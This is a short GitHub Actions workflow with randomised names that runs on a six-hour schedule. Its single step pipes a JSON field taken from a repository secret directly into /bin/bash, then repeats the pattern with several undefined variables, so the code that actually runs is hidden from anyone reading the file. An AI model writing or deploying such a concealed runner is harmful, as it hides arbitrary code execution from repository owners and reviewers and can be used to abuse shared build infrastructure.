name: gzhengfudy

on:
  workflow_dispatch:
  schedule:
    - cron: '57 4/6 * * *'

jobs:  # 7016
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gzhengfudy
        env:
          my796: ${{ secrets.my796 }}
        run: |
          echo $my796 | jq -r .a43 | /bin/bash
          echo $ngmmm1 | jq -r .h21191 | /bin/bash
          echo $b97 | jq -r .rut725 | /bin/bash
          echo $gnaei5 | jq -r .snsac45481 | /bin/bash
          echo $zz72 | jq -r .d2113 | /bin/bash
          echo $gw271 | jq -r .ew018 | /bin/bash
          echo $p76 | jq -r .duvbk1 | /bin/bash
          echo $lfsy3 | jq -r .sx4 | /bin/bash

